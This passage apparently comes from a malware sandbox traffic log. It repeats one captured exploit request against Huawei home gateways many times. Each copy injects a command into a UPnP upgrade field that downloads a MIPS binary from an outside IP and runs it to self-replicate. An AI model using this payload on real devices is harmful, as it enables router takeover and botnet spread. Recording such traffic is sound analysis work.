s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 